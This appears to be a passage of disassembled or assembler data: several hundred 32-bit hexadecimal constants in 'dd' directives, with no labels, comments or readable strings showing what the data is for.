		dd 0D74DBA0Fh, 929DDBC5h, 69206C7Ah, 0A456B462h, 92214E84h
		dd 6DF41BFEh, 0EB5591BFh, 0B4484EA7h, 529C31CDh, 42EE6C8Bh
		dd 1CBD93Eh, 0A101F121h, 0D435EF6Fh, 52F8A39Bh,	0BF224A54h
		dd 81C8AE9Ch, 0C9CEAD98h, 258B8297h, 674C87E0h,	1557AC6Eh
		dd 9C5263ADh, 137C51BAh, 0C1CDBE1Fh, 78E75F62h,	0F1C71453h
		dd 9D4B5AB3h, 97A2B72Ch, 33AF86EFh, 7A50EA29h, 1EB80024h
		dd 0A46F02B8h, 9517CE4Bh, 0D5A3B820h, 0A1F313ADh, 81A83D64h
		dd 2BEF8703h, 72358DFBh, 45E1BD2Ch, 8C53BA18h, 548A7CEh
		dd 9DE8DD8h, 6BACD7B6h,	7AD80998h, 0AA3EB37Fh, 0AF722E0Fh
		dd 32D5BFA9h, 6329FBCEh, 896C0B46h, 0A48FB955h,	65FB2719h
		dd 0B568B761h, 7E3ADF6Dh, 12DE2FBFh, 137DA623h,	4E965EC4h
		dd 568A8EBDh, 0A6AC62AAh, 175B64DFh, 3BBD5776h,	290290E0h
		dd 9B227093h, 9300C7A5h, 0AF2A1518h, 0C2E5C371h, 643BCBC9h
		dd 520EC0D7h, 92BB6B3Ah, 575BF5C2h, 5186D040h, 1A80D957h
		dd 9F7FDC42h, 0A273882Ch, 0B0BE7BE0h, 1960E402h, 4395943Fh
		dd 49A25E4Dh, 6CBF2FC3h, 2AEEAC6h, 0A439B801h, 0D2777662h
		dd 1084089h, 13BAAEA3h,	0CCF3559Fh, 3D3C5165h, 87D97DB0h
		dd 157A86ABh, 0B95C02DDh, 4682A036h, 5A6C19EBh,	1F1E54B7h
		dd 3CC2E898h, 0F24A73D1h, 0C791FEA8h, 818FA9Ch,	0AAEEF198h
		dd 0A66C5A6h, 814B4CE7h, 0A8D8E876h, 3D3EB7A1h,	4EE451FCh
		dd 0C97E485Eh, 612AB9FEh, 0FF3C1D63h, 76D5F82Ah, 5F83346Eh
		dd 0E7EC17BFh, 1DD99EAEh, 8DE4AE08h, 0D2643ACCh, 5B75F73Ah
		dd 0F0BAF389h, 10D38E1Ah, 78ABA7FDh, 94B5AEA7h,	547A9E2Dh
		dd 1FF52EF8h, 38A2A77h,	335FC960h, 0EF7552A9h, 67A07644h
		dd 0ED1A11F7h, 0A46B0067h, 20BBABE8h, 0E8A48CD2h, 4A3377DAh
		dd 0AA8416B4h, 0E9319E0Dh, 0C93BFB53h, 0CED880AAh, 12AC9DFAh
		dd 292F1B67h, 1DCA0F07h, 0A52FAEC3h, 17DA4375h,	0BAADECECh
		dd 0CE95A871h, 0F70B6239h, 5462896h, 0EE1B2B7Eh, 0C29A35EAh
		dd 0AF865303h, 6339497h, 0D7A3FB8Fh, 136FE233h,	56D4E901h
		dd 0A3DBDDFFh, 0DB787775h, 982C6768h, 4A463C78h, 6FB311E4h
		dd 9E3AB4CAh, 0DD2FFBECh, 0AC3E8006h, 97FE9344h, 38BF3DCh
		dd 25FD0107h, 4E4D7D0Bh, 1080E472h, 62EAE0F9h, 34200C88h
		dd 0D16DA5F1h, 3AD572D1h, 7157111Dh, 28771490h,	5B5FCF0Bh
		dd 81B333FFh, 2182CD41h, 0C6A88445h, 0E4F8ABE7h, 0F46F1630h
		dd 0EAC53E18h, 47F18781h, 3FB22FF0h, 0A666ED73h, 2AF6B2AFh
		dd 0CEE1D6F1h, 511B8B4Fh, 4B521D76h, 56994D9Ch,	2D425FEFh
		dd 6826DCC9h, 8DB6A7CDh, 1F14BBA6h, 0F1C1DB10h,	0C0FCA565h
		dd 9C2C250Dh, 26176658h, 0F5EA40BFh, 0D718EC28h, 252F3CEh
		dd 0EEEC447Bh, 16662FD8h, 0CB4B1756h, 86EA2606h, 0C568DE7Bh
		dd 269BD5EEh, 23769C2Bh, 0CE3B2E87h, 9B2A28FFh,	0BFBA7AC3h
		dd 0A7471594h, 4051511Bh, 0B513DB07h, 7057ADBEh, 0FBFD155Dh
		dd 0BA042B91h, 45D350CBh, 120A6F83h, 13FCCDEBh,	3FD871Dh
		dd 1BBE76F1h, 0F92181A4h, 0FD4619F5h, 52E0EE3Ah, 0FDB89C63h
		dd 0D3FDE5FEh, 0B9B40A68h, 8C2AB28Bh, 8D7E5810h, 6C09800Ah
		dd 95A35E03h, 718EB75Fh, 0F55FB985h, 9D439EC8h,	0DA9D03DDh
		dd 37B59BE4h, 58C5DAFCh, 0CA1DF710h, 0ABD9C71Fh, 2D6401B9h
		dd 97E332B2h, 0DA04A450h, 9069E5CFh, 0A92BEEB9h, 6521A0D7h
		dd 0D0E0B130h, 2BD56D8Dh, 5FE77979h, 4F7ADF26h,	76A933C5h
		dd 6EFC65F8h, 279BFDE7h, 0DADA046Fh, 0F1EB16B3h, 0C60419FBh
		dd 99C597FEh, 57DE1270h, 0BC78CD92h, 174A935Ah,	0C62938FDh
		dd 568B9DE5h, 4265102Ah, 55AF971Fh, 2A84F908h, 29A5F379h
		dd 6B8943E1h, 0A875AAD6h, 0B547E91h, 479C37FDh,	55C71DF4h
		dd 74DC10D0h, 1A8F90D3h, 8359F0EDh, 0C7F74D2h, 363B6D01h
		dd 14E1525h, 0A4E0386Dh, 86D2B96Dh, 355D61B2h, 54891D9Eh
		dd 0BC9A2BC3h, 8B1352E8h, 0C635529Ch, 0F4C3B2F8h, 977935B7h
		dd 8C23989Fh, 337B4AA1h, 313586Dh, 37DDB22Eh, 0D7158F2Eh
		dd 6FB8F940h, 0FAC977F3h
		dd 0E493528h, 58189DC6h, 9E3CE6F3h, 0D495D0C2h,	0CDE51B0h
		dd 0C350E09Bh, 0C980CAF1h, 9E7369CBh, 31B1D918h, 3DD2880Eh
		dd 0A1B018F7h, 7638AF6Bh, 69A1F9D4h, 438202FEh,	2B5C89FCh
		dd 0A2677639h, 4C9DBEE7h, 0D7A13FEAh, 0E732AC77h, 5ACB0FC5h
		dd 88764A86h, 0A6BBD779h, 81288CE1h, 817F5707h,	1B3FA85h
		dd 83339D36h, 3F9E69E5h, 0DFADC495h, 4FD1C6EDh,	374B10CAh
		dd 75609083h, 6A918F5Bh, 23E96A31h, 2CF961A1h, 6C14FA95h
		dd 0EC011F59h, 0F6989594h, 0D6202771h, 0FEBDA128h, 9A497E32h
		dd 4055A439h, 0ED86B890h, 82360A48h, 383C492Ah,	3963C25Eh
		dd 3A33E890h, 0A31860B3h, 0D54DB337h, 8E55C727h, 471BCBBDh
		dd 391F0748h, 917C4446h, 8AAC5A32h, 19AB45A8h, 96D47E26h
		dd 383C03E1h, 0CC21B84Eh, 728BCE24h, 0D9ED7098h, 8AED4513h
		dd 8DD75808h, 4979D740h, 0BB21F195h, 0BF293E96h, 0EABF4E3Fh
		dd 0DB1F722Fh, 205914BFh, 9F7AEDFDh, 8956B369h,	2083C96h
		dd 2E53663h, 214DCE57h,	6323C3h, 0A7658365h, 83FEC5ECh
		dd 66FFF222h, 0A108D98Bh, 0C8CDE488h, 0B465B5B5h, 57795F90h
		dd 6E6CF7B0h, 3F80ED46h, 0B9329739h, 0DD2220E1h, 9E8EE03Ch
		dd 5AFB3371h, 0B6A5ADFh, 7CFC0D90h, 0D2FDDAC5h,	7F648109h
		dd 0DFCCA18Bh, 0CE05780Ah, 44E41B5Dh, 0B5663907h, 0DCCF4A27h
		dd 9F16D0A1h, 4B0E4C6Bh, 0A1F45652h, 64535E8Ah,	0AAE790F3h
		dd 452C72FFh, 64EA2A7Ah, 12B6D3B2h, 89827494h, 3BA4925Fh
		dd 0AB92D71Eh, 0C8D55BD8h, 0C1F6DCB9h, 0AAE6C1EDh, 0A5FBAA53h
		dd 0A325454Dh, 0E8AD3ABBh, 0A9B43851h, 0BCFF47B0h, 7CC7696Ch
		dd 59CBC213h, 0DB336D6Ah, 27AB4557h, 841FC18Dh,	4FDD0122h
		dd 62FE704Dh, 0B6D7531Dh, 0F918AA80h, 0B1DCEE5Ah, 0B6469ABFh
		dd 0AE85D25h, 642796A3h, 0C6BD2AE5h, 3E7623E6h,	50DF158Fh
		dd 0D2BBD930h, 0BF0E7AF3h, 0B6E11558h, 91371128h, 3290D558h
		dd 5C8878CDh, 0BD99D84Eh, 7D6527BEh, 0ACB48995h, 88FF5B0h
		dd 3C4A681Ch, 0AF5D172Dh, 476741EDh, 125D9AB8h,	6FEBBEE9h
		dd 22578E24h, 0A31B335Fh, 0AD18D33Dh, 0E546375Eh, 348D9AF5h
		dd 5824AA5Eh, 97951D34h, 0EDC41572h, 873A70C5h,	2F12C603h
		dd 5D4E4158h, 0AF1FA95Ah, 0E6C1493Fh, 8F55ACB6h, 0CC5F54EEh
		dd 0D6536B89h, 77A021D4h, 0A256955Eh, 0A75924C9h, 0E07C88BCh
		dd 791D14ADh, 8FD77C82h, 0C437B2Ch, 3307666Bh, 0C676090Fh
		dd 0B477582Ch, 8216EB93h, 97BE3986h, 0A983CD2Bh, 8CAE8E5Ch
		dd 197C16Bh, 0C0F1A92Eh, 0AB595153h, 7B46E77Bh,	0F4C042FFh
		dd 9455C6B2h, 4E657CC8h, 0BF69BE75h, 0A9C8C37Fh, 840B2DF7h
		dd 0E7F248A4h, 16772657h, 271E2ADCh, 0F00ECDC9h, 75445AE4h
		dd 0E16774F6h, 0B119D569h, 0E9E368AFh, 1098311Dh, 0CCD9F7CEh
		dd 9ED17161h, 0EE20F69Bh, 0AF59843h, 0FA47ABD8h, 0A38B368Bh
		dd 0F637E766h, 0F95782FCh, 9DCCBD8Bh, 0C4772589h, 0D57B2A8Fh
		dd 4D1F47ABh, 7157457Fh, 0C55EEF15h, 74D55AD7h,	666E52D5h
		dd 712AA2ECh, 17E36E5Dh, 11985BACh, 405FE5FCh, 0C5643E5Bh
		dd 9A2CD1D8h, 0D561B58Ch, 0B14A77A9h, 9B04FC3Bh, 0C7CCEB32h
		dd 76E45509h, 0A2650BEFh, 85F27AEh, 0B918AE98h,	57556A76h
		dd 4BCDA1FAh, 182498F8h, 7BB2AF5Fh, 2A183AD0h, 805BE3EDh
		dd 4D972584h, 5A2BFF4Ah, 0FE0B302Ah, 459958A3h,	0F4A1FFDBh
		dd 0BC70FC42h, 0F54C3EBh, 0CE83C692h, 50C046B4h, 0FE5D667Fh
		dd 0D1F3F5A3h, 6C076E2Eh, 58C4BECDh, 0BE138B8h,	0CA4C1F9Dh
		dd 59A6086Fh, 7D9B2D87h, 66FD4EFDh, 53771D7Eh, 0BD7E9845h
		dd 0C7BD79E8h, 0E674A44Dh, 9AEF07DCh, 15435F6Eh, 0A65B97CAh
		dd 7E5B77BBh, 45F09D35h, 8CE9990Fh, 677E9DBEh, 0B4EA0638h
		dd 85F1577Eh, 0FDEAF45Fh, 0C858CDE3h, 0B4C63E91h, 9A85A232h
		dd 0A38E1559h, 82B2318Bh, 0F7B8ACFh, 0FCEB248h,	25539AACh
		dd 0EB6B9DC7h, 954595F2h, 2F28F785h, 74FD367Ah,	0F9194DE5h
		dd 385AEBB6h, 0AFC21C4Eh, 2A5B99CAh, 89E89450h,	0FC533A91h
		dd 0EC944F5h, 4735BEC8h, 221C990Bh, 79FE158Ah, 0FB959DB9h
		dd 0AD1F5FCh, 2A500E2Ch, 81764CC8h, 0A88B1337h,	0C8A593B5h
		dd 29B60087h, 3C5C8EA4h, 52B26AFEh, 0FB0073F4h,	0AE6C5B82h
		dd 0F97012DEh, 0A87EEE38h, 62576535h, 35F503E1h, 6A680FFDh
		dd 0AF1644FFh, 0C88FEADAh, 0AE2D5383h, 0AECE3CF7h, 12B47436h
		dd 84B726D8h, 0E3357E7Eh, 0F5D08F1Fh, 0F91F981Ch, 0A365969Ch
		dd 2B51D2C5h, 1D6A5979h, 76B9863Ch, 8DF8BD0Eh, 129624A2h
		dd 0AEF43C15h, 73358E0h, 0C834EEADh, 0D632FD86h, 139D07B2h
		dd 0AC8D1A17h, 0C866550Ah, 39A8FE65h, 0F7130E17h, 0D32AE48Fh
		dd 0C3CCF8AFh, 8BED05CEh, 0FA38703Fh, 0BDF542E8h, 17D7A824h
		dd 0AE998FC9h, 7529EAFBh, 607AB456h, 1C478490h,	177EB1DBh
		dd 6679542Dh, 7DE3FA36h, 0A88981EFh, 2EE7B43Ah,	0D62063AAh
		dd 0C1588BB5h, 9F7077FEh, 0CEC6C2Bh, 0DA9FAC27h, 9CC61AA5h
		dd 6A7E7F61h, 760F2B7Fh, 0E5544C4h, 9E6DF5B1h, 1AB0A975h
		dd 0A0C5A24Dh, 49D5EEDFh, 0D06B1E81h, 0AA907078h, 0D951418Eh
		dd 9B4F435h, 0F2478163h, 12C125A2h, 68D79B2h, 607C6B97h
		dd 0D5C714B7h, 0C4ED7F29h, 77CF4B0Fh, 0F9502AAAh, 0D652CF7Bh
		dd 0CE5A5D80h, 0B9AD5D51h, 856320BAh, 0A6F5F5DAh, 8946D5B0h
		dd 78737F1Ch, 409EDF60h, 47B9D845h, 46D175B8h, 99F8BC06h
		dd 428058E9h, 8B1E844Fh, 10373A1Bh, 805A64AAh, 0F51CA5A4h
		dd 8F5AF9D4h, 4B2CB96Ch, 352B3EB1h, 0E5AA5597h,	8954CD83h
		dd 353FB994h, 0D140CE5Ah, 0DF6B8EA4h, 0FE3A7DF0h, 52846705h
		dd 88EF6FFDh, 0AE19299Bh, 44C43B36h, 0F8CFD2C1h, 9DD1C1E1h
		dd 797CCAFAh, 0C6C6A6A4h, 0F333050h, 8BA9267Fh,	6E4537E3h
		dd 9514E0A4h, 0B8DCD895h, 2224F72Bh, 519342Dh, 0A53BB2C5h
		dd 5C83D2E4h, 72DCC133h, 0B515E19h, 9283977Ch, 0C488BA6Bh
		dd 65D94808h, 2E6FF8A0h, 2E9F544Fh, 0DFA6F90Ch,	760327DCh
		dd 814CE8DFh, 0D213DACDh, 55F9C7CAh, 3F0A9356h,	7553DB6Eh
		dd 2A3CC124h, 0C166BFA1h, 96D94973h, 5DC89F23h,	76EBDD4Ah
		dd 0CC46BAD7h, 2DEFEDD8h, 6527C1A0h, 0E698E7B2h, 1583011h
		dd 79A7D16h, 5425C87Eh,	176DBADEh, 2B8B7675h, 35DA27E0h
		dd 0C203D47Ch, 1C6D3BAEh, 0B5CE6886h, 0C66F8B46h, 0B97F282Eh
		dd 0E5CF03C6h, 0A168AA38h, 32543959h, 1DD70BF0h, 0F86758FEh
		dd 716C912Ch, 0D2DB0276h, 0A2D068F9h, 0F73B3381h, 3089E5A8h
		dd 0EDEC0F74h, 0F8BA6890h, 3DBD9A15h, 96C6433Bh, 7D18617Fh
		dd 7DB98F41h, 7D183529h, 86ADA2FAh, 0AAF0F61h, 6C391D49h
		dd 70E8C344h, 7D0EDBA6h, 571504A0h, 9C668F0Ah, 0CA545545h
		dd 0BADABB4Eh, 0EBF7ED1Ah, 4BF89A04h, 7AFD19A8h, 4AEF88DAh
		dd 781FA32Fh, 30358ABh,	0C309F0Ah, 851CEA28h, 0F4E145Fh
		dd 1D7BFEFh, 84BED4D5h,	8C784B66h, 0D9393B8Ch, 4ACE2ABFh
		dd 0BC17286Ah, 9129B271h, 0DD16E6C3h, 6260D915h, 0DEF7CCBBh
		dd 54F55B2h, 7489763Dh,	4E8850CEh, 0F0C3E1FEh, 0AF649EE6h
		dd 0A9EBDF45h, 0BF2D11A9h, 8370ADCEh, 3C4B3151h, 259C7910h
		dd 47ABEB73h, 340C156Dh, 49B8476Eh, 56306DA3h, 0B2116533h
		dd 0F4338A9Eh, 797F81FBh, 0F57616EBh, 86A77E83h, 83DA9381h
		dd 0D2E548h, 0A02F3A1Ch, 0F2A8FF1Ah, 8B9A29A8h,	561F7EADh
		dd 3B0E9B08h, 95A188E5h
		dd 9E330E0Fh, 53F9C960h, 8B5150F0h, 7AC7A1Ah, 49EC4662h
		dd 76734153h, 310D25C8h, 0D7821F45h, 7CAD42CBh,	2C3623B0h
		dd 0F57F8571h, 0B92148FDh, 79F23486h, 0F90D385Eh, 4589615Ch
		dd 2A3AE64Ch, 0A8E257EAh, 0BA1BD0AEh, 0F9C6F96Eh, 0BC896A41h
		dd 0A607E6BFh, 68B428A8h, 4B4703Dh, 40A86A11h, 0DA5416ABh
		dd 37244083h, 13C3E39Fh, 3DD86D96h, 3CD57433h, 2AEC144Ah
		dd 0D8F48363h, 8569D815h, 9B8A9E3Dh, 0E4EA4A42h, 5449EF6Ah
		dd 91AF2D2Fh, 7F3C732Eh, 88FE970Dh, 4AEA1607h, 8E5D146Ch
		dd 0E50E9FCBh, 9381D7A0h, 2BA4C36Eh, 0BA094411h, 1F8682D8h
		dd 0E7BB2E9Eh, 0A335E3EAh, 0DE5AD4A2h, 0B34A46C6h, 0A981E8A5h
		dd 5E0E8DC3h, 335B6412h, 2E537DECh, 0F02448EEh,	0F020F7E3h
		dd 852DF66Bh, 38A0AB10h, 0E478E543h, 417A449Fh,	0E0976BABh
		dd 0A7F293AEh, 0D79E6FE1h, 74E97476h, 0B1CF2EBh, 0E6E27E2Eh
		dd 7B2B5446h, 0FC64B82Ah, 7D401FA1h, 2D5DB0F4h,	43CDF71Bh
		dd 235FED4Eh, 0AAB242AEh, 0AE5931CCh, 1505F2C4h, 3DDD7091h
		dd 41F9860Eh, 53BF020Bh, 7A9C8DF6h, 0BEBDC966h,	0C438B5DDh
		dd 0DB6BFE9Dh, 258870F3h, 0EAAAB3EBh, 4ACFE856h, 86B72D66h
		dd 7DBB61D5h, 2299039Fh, 3C53EB5Bh, 0A046AC3Eh,	0D8A10893h
		dd 6795022Ah, 541FE4EDh, 62DE783h, 0E621C41Ah, 99EFA8C3h
		dd 18DE3E18h, 2490AEA8h, 35D59246h, 0AA4ACBC5h,	4FAA1BD3h
		dd 0F61DD977h, 0B0695A26h, 1CD646DDh, 8AFB11C7h, 0BF8BEA73h
		dd 0E8A464Ah, 0DDC45D2Dh, 0D49D0437h, 1ED95D0Bh, 3B1A91E6h
		dd 50881A66h, 1C8C9F32h, 55AFA565h, 93602DA9h, 0ADEEE94Fh
		dd 5FF3783Dh, 0F097AA40h, 66CC4B9Fh, 0CD341A36h, 6B6BEC87h
		dd 0EABF2155h, 1189496Bh, 57DC7A53h, 0EDD166C1h, 86DA2168h
		dd 5D12F16Ah, 0C5F77990h, 97A9B9DCh, 595246F2h,	70DCF9FBh
		dd 8AB9672h, 0C8CDD3AAh, 0F2FEAFCDh, 0B4CF3AC0h, 2A6EDFA9h
		dd 0D1910EEAh, 0C44EA45Eh, 5B1ADDACh, 4A2A0E1Ch, 2FA9A25Fh
		dd 90935AC9h, 70FF936Dh, 771E1CC4h, 0C6250867h,	0E390022Ah
		dd 12D0096Ah, 2B33FC17h, 974EE3C8h, 5D97DA5Eh, 10393A53h
		dd 2BE2D564h, 0FB8D5DFDh, 0A717695h, 8F02D2CEh,	46D4B86Ch
		dd 0F26E5F6Bh, 8EB45A4Bh, 2DA0DD7Eh, 7824BFC7h,	0DE34A152h
		dd 6D95A04Ch, 0EF613A9Ah, 0C5E3DD48h, 91658F6Ch, 0E45A03E7h
		dd 0ED1DF3EFh, 7DEEBA5Ch, 773ADB78h, 46B4BF0Ah,	36CD13A0h
		dd 46054837h, 0E7DF372Ah, 0E2BB315Fh, 2355A6B9h, 9B0B2F5h
		dd 6DDDC2F4h, 8BB5EAC5h, 580A6E8Bh, 596B2CD3h, 0EAED6F9Fh
		dd 0F1B49D2Ah, 0D8690417h, 0AEB5932Ah, 390679E5h, 0C821B1BEh
		dd 32607214h, 5F21747h,	0A6FEE7BBh, 9499833h, 0DF3DFD7Bh
		dd 0D1FD947Fh, 176BDD5Ah, 9354DCCCh, 0F9D1BDFEh, 11B2A085h
		dd 8EB3766Ah, 0F9B7C6Bh, 17CF61E4h, 2AB92587h, 5D017877h
		dd 0DFCAC54Ah, 0B3F563Fh, 0D64AE36Eh, 0CEB42FBDh, 0E0D70999h
		dd 1ECCB0AAh, 368EE332h, 29B24B2Ah, 50BA3D26h, 6BE7ACB4h
		dd 0CAB24D2Fh, 8A1DFC94h, 9D531FA6h, 34BACC51h,	0FD3E8A2Ah
		dd 0B4CD430Ch, 0D50F7623h, 17EACE1Fh, 0FAABC5E6h, 0EDB6D92Bh
		dd 0A716FCB1h, 0FE5AF006h, 78FD6082h, 772130F0h, 0EC644D7Ch
		dd 0B237386Bh, 9EC0488Ch, 52EF2C5h, 67CEF8FDh, 0F23E54F8h
		dd 368C7BBCh, 14CE566Fh, 0C1E1FF8Ah, 7EBEF211h,	0A6A145CDh
		dd 0E7F6BDh, 3B42E1Eh, 6AF04F53h, 0CF55C0A5h, 0C9AC12D9h
		dd 36B13A34h, 0F26D0447h, 0C12B1D0Ch, 3F1507D5h, 0B4BD0484h
		dd 671CA190h, 2A5DBC9Ch, 0AABF56Ah, 0A235DCD2h,	0D8C5C09h
		dd 0AEB321E2h, 10D6B680h, 7576360Ch, 69707027h,	6E784B12h
		dd 1F8B69DCh, 0D6AB1F0Eh, 3E8860EDh, 0BA027595h, 0A56818BAh
		dd 0BED896DAh, 0E613F7D1h, 0BB17D70Bh, 0A1069F6Bh, 0D018E175h
		dd 6DE39D54h, 277B85C0h, 0B6BF5E41h, 0E1A0A1Fh,	0CF5A8BA8h
		dd 41A44C6Ah, 6E8FADE2h, 0E76CC976h, 838AB00Ch,	53F17FF6h
		dd 0D8A9FF05h, 6A454937h, 1CBBB3C4h, 25BABFFDh,	4DB1A925h
		dd 0A1E1B745h, 0D184AFBAh, 97B9481Ah, 3D692577h, 502E36Eh
		dd 0D9332D4Dh, 0F61D2929h, 75632F9Ah, 0CD299EDDh, 62A51D75h
		dd 0AFA65397h, 0BBCC40E2h, 1F4B42C5h, 6D8DD459h, 0E8500F34h
		dd 1932595Bh, 6F373996h, 68E5B924h, 677034F9h, 0D56B3B13h
		dd 0DEEE237Ah, 0F6E9191Ah, 0E5E7F6B7h, 9D341EFDh, 0D390C4F9h
		dd 0EFAB2A53h, 9F85C9A3h, 6BD725C6h, 546C4716h,	47CC7BADh
		dd 0D047CAAEh, 0D7045D57h, 8E88362h, 0C3CF5503h, 6665E417h
		dd 43F1147Dh, 0F2CC5385h, 329EF2EEh, 40C543BBh,	6078EA15h
		dd 444C9183h, 0E9B511DEh, 0F37CABA4h, 9D06BBFAh, 86E34573h
		dd 0DA1ECA9Eh, 364B4AD9h, 0A168892Ch, 4D41B6DEh, 0B340F1D0h
		dd 0CFBF3CF6h, 71ED73BCh, 1E9FCABBh, 0D4E3BB7Bh, 0C1679FEEh
		dd 0A1E54E5Fh, 9D2FF2DFh, 38D5FD17h, 0B3FFC57Eh, 0D65DBD5Ah
		dd 0F7BB3788h, 0BDA27BF6h, 9040B34Ah, 0B3547537h, 6029780h
		dd 0C5FE877Eh, 9D2C69ABh, 4B6E8076h, 69CE6A6Ah,	4956E0CBh
		dd 8964CCFEh, 0A628BF62h, 5DAAE83Eh, 0C66B5F2Dh, 468E55B6h
		dd 3873F0D3h, 87FBCCDBh, 0B67C74B1h, 0C289BA6Fh, 0AE671F47h
		dd 0FC133E1h, 0D686D0D6h, 0ED9F0758h, 0B1C59760h, 49A6F08Eh
		dd 0D483D095h, 462C715h, 9540583Eh, 2544AD68h, 0CE677115h
		dd 0DD22810Fh, 8B7E5DC4h, 1845FC3Bh, 5CD1A8BBh,	94A2F53Ch
		dd 80A344B6h, 6012F605h, 98372F4Bh, 0A5EDDA2Eh,	0A3115C42h
		dd 0AF5AAFC4h, 26321BE4h, 0F35E2812h, 0FB34EB81h, 67D5F118h
		dd 0D6B06FE4h, 4C344BC4h, 0DF5E8A1Fh, 0F9F04F5Bh, 19925722h
		dd 4B218DCDh, 261B4A26h, 22FCEEFh, 0DFC373BEh, 0C1A09E40h
		dd 0A1D444F7h, 0F879E10Ah, 955BB7FDh, 683B3BD1h, 0F6E98D65h
		dd 0CD25A8AFh, 52996A54h, 0AE404ED0h, 260390C0h, 3621CF7Ch
		dd 0A5896A54h, 0A626237Bh, 0B74B8E08h, 27F33ABFh, 4DDFE13Dh
		dd 55BC79E3h, 5D77680Bh, 2775581Eh, 8242D1A1h, 0A268904Bh
		dd 0C9D1BCAEh, 0E9FB2929h, 0A4423BEEh, 0A9F5C779h, 0E8D6D5BFh
		dd 3B2FD699h, 0DE6BEB4Ah, 7D605DFDh, 0EC1BA3EDh, 0F7DD95D6h
		dd 0AA106878h, 7FC5AC23h, 0C08CD021h, 0EBD85773h, 0E5DEA5B7h
		dd 1A7EA7Ah, 0E1ABFE73h, 0CC2E61B8h, 88A3B915h,	276AF21Fh
		dd 0DC2839B8h, 0D60FB3D6h, 454B4A30h, 0C7DF3AEBh, 6E0A3507h
		dd 8DD45346h, 8D59E3DFh, 541D0C8Ch, 24F9B364h, 48A098DEh
		dd 904AA20Dh, 0A0EAA5AEh, 0F135FB2Fh, 7BDB9EC3h, 0CE707A03h
		dd 602573B8h, 1ABA7DF1h, 1937E5DEh, 8A1871BFh, 372BD0CDh
		dd 4EE9D0CAh, 63771944h, 0C3577B06h, 617D0C8Bh,	68B748F4h
		dd 39110F09h, 46F97BEAh, 0C17FD8E5h, 0E3071C9Ch, 996A96EAh
		dd 0CEB8FE2Bh, 0E3C70B6Fh, 3619FA82h, 0DC39DAECh, 52BE339Ah
		dd 43515732h, 0E390C069h, 77D983F3h, 7D72018Dh,	0E7B364A2h
		dd 574F5BAAh, 0D62BA53Bh, 3F6CF316h, 372458AFh,	0A6A0056Bh
		dd 9982B90Ah, 0AA54B8E9h, 79DDD5Ah, 426C9AEh, 6B08397h
		dd 7911FFAh, 0D962D5Fh,	0EF7E046Dh, 52EED483h, 388DB897h
		dd 3AC8CB73h, 746A45FDh, 0DA074EB6h, 0B810C123h, 0DC95ED3Eh
		dd 0DE5762F4h, 924F4F17h, 5785AC36h, 0B8B474EAh, 785502A9h
		dd 780BFE9Bh, 0B2AEF77Ch, 99498DA8h, 0D36B9016h, 1670DBCCh
		dd 0E1422D5Ch, 30EAE5DCh, 2D343A7Bh, 552A8B96h,	8F74F335h
		dd 0CEC2F335h, 0CEC49730h
		dd 0EA2E38FEh, 0BA19FB61h, 0E756EE4Eh, 660968A9h, 0AB992B27h
		dd 0BAF0C324h, 4ADD9A3Ah, 1AD0CEEBh, 19AAAF14h,	0E6F7329Fh
		dd 4A4937C2h, 0A642CEB4h, 813985DEh, 51D4EEB6h,	0F852EA03h
		dd 3C5A5056h, 6F8DA87Ch, 0EA4A946Eh, 0EF6DDF41h, 5F82838h
		dd 36846257h, 1E783BE3h, 0C404E07Dh, 4AC7ED8Fh,	0F5B38D3Dh
		dd 2F3C22D1h, 3FC56169h, 31D88D26h, 0E4519E7Eh,	284700E6h
		dd 0A527E1F8h, 3D13115Ch, 17F69E1Ch, 78174978h,	0E9D3CE60h
		dd 394E4EB4h, 9D981079h, 95066B90h, 0E7040B21h,	0AB73B8B5h
		dd 70F5ABD3h, 0EF42BE54h, 8F03A236h, 5B2AA93Dh,	8341EE93h
		dd 0F670C7C2h, 59A2F552h, 0D25C68F3h, 0E90EE5EEh, 0E5785F95h
		dd 17839756h, 2C701ECDh, 0A7FD30C7h, 0B17ABE4Fh, 1C0FC925h
		dd 11A518D3h, 0ABB7DB15h, 0A4FB2974h, 397A6058h, 0CDA491BBh
		dd 99CE9AAFh, 0C0E2DAE9h, 4F59D36Fh, 25FFFF4Ch,	75EE3C57h
		dd 3DD5799Eh, 9A2A5378h, 0D6BD25D5h, 6B3F3EA5h,	305C299Fh
		dd 0A3990FBFh, 2AC2B9B5h, 618759E0h, 0A1D0AE7h,	8992E23Dh
		dd 0FE928D76h, 6B6794CDh, 0F84C1C68h, 0A0B85262h, 189A4563h
		dd 0CA036931h, 0ED143A6h, 418A2C5Ch, 0AE120675h, 0A25460A2h
		dd 293BAC1Dh, 0A87EBE4h, 0C0730756h, 0B854A95Dh, 68CD9E3Bh
		dd 498C0F5Ah, 0E533E868h, 52BC0FECh, 0B5995EECh, 14C45DE6h
		dd 58C43E97h, 0B6540FA1h, 0B2D1C086h, 0B8C8BAC4h, 0F1871D57h
		dd 3DB57BC7h, 0B87BE26Ch, 0A6880852h, 0FFBFB5FAh, 28F93D93h
		dd 0E1E2A569h, 703FDC2Bh, 7A07A253h, 0C6552A67h, 95585059h
		dd 0F1D224E4h, 0B5483912h, 68B85FDAh, 4FA56D0Dh, 2E8A9D85h
		dd 18A555FCh, 0D32D2C25h, 0F74BAAA6h, 8233119Eh, 0C4BCCCB1h
		dd 12D19F75h, 0F5D6BE3Eh, 0CA9734A0h, 8CDDFF59h, 0C9E30E1Fh
		dd 3C73C495h, 0CCE37578h, 0E0D6C53Dh, 0B4A54E1Ch, 0E7E206E6h
		dd 92550E57h, 0DC594B34h, 525A9640h, 0EFDA170Dh, 5D0B9C2Eh
		dd 3CBE3132h, 0C3303746h, 462BCD4Ah, 7B229048h,	0AD9E0336h
		dd 0ECD4991h, 0EA3315DFh, 6E5DEC09h, 7FE7BCA8h,	52796606h
		dd 5E07C199h, 0D1DE19DFh, 0D43D956Eh, 0D22D744Ch, 31082530h
		dd 0D3FA370Bh, 16C8C82Fh, 8AA19FF4h, 4D8C4FAAh,	0D976671Dh
		dd 0D125D2FBh, 0DDEC1659h, 12045074h, 0D2E5B386h, 0C8EAA16Ch
		dd 166D5F02h, 0D71688F0h, 0F182BA96h, 21257983h, 581FF833h
		dd 65AFA76Ah, 0D60A568Fh, 1F12B4FDh, 0E3B844B0h, 0FDD59259h
		dd 67877B69h, 5A67EABDh, 0ABB2E037h, 190A85ACh,	0D74AB1B8h
		dd 985A77CDh, 2D5A4E15h, 4EC12B1Ch, 0E0CA931h, 0DB9CAE0Fh
		dd 5B9CA03Ch, 0DA558D76h, 45264B6Ch, 0B4527185h, 0B66A8FB6h
